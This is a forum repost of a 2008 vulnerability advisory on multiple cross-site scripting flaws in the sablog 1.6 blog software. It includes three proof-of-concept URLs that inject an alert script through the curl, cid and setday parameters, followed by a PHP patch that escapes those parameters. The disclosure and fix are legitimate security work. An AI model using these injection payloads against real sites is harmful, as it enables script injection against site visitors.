免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3572 | 回复: 0
打印 上一主题 下一主题

sablog 1.6 多个跨站漏洞 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-04-09 13:59 |只看该作者 |倒序浏览
Date:2008-03-27\r\nAuthor:amxku[c.r.s.t]\r\nVersion:sablog 1.6\r\n\r\n由于过滤不严,存在多个跨站漏洞\r\n\r\nPS:\r\nhttp://www.amxku.net/?viewmode=list&curl=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>\r\nhttp://www.amxku.net/?action=index&cid=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>\r\nhttp://www.amxku.net/?action=index&setdate=200804&setday=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1\r\n\r\n临时解决办法:\r\n\r\n在global.php中过滤curl,cid,setday等\r\n$modelink = \'\';\r\nif ($action) {\r\n $modelink .= \'&amp;action=\'.$action;\r\n}\r\nif ($curl) {\r\n $modelink .= \'&amp;curl=\'.htmlspecialchars($curl);\r\n}\r\nif ($cid) {\r\n $modelink .= \'&amp;cid=\'.htmlspecialchars($cid);\r\n}\r\nif ($setdate) {\r\n $modelink .= \'&amp;setdate=\'.htmlspecialchars($setdate);\r\n}\r\nif ($setday) {\r\n $modelink .= \'&amp;setday=\'.htmlspecialchars($setday);\r\n}\r\nif (intval($_GET[\'searchid\'])) {\r\n $modelink .= \'&amp;searchid=\'.htmlspecialchars($_GET[\'searchid\']);\r\n}\r\nif (intval($_GET[\'userid\'])) {\r\n $modelink .= \"&amp;userid=\".htmlspecialchars($_GET[\'userid\']);\r\n}\r\nif ($_GET[\'item\']) {\r\n $item = urlencode(addslashes($item));\r\n $modelink .= \'&amp;item=\'.$item;\r\n}
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP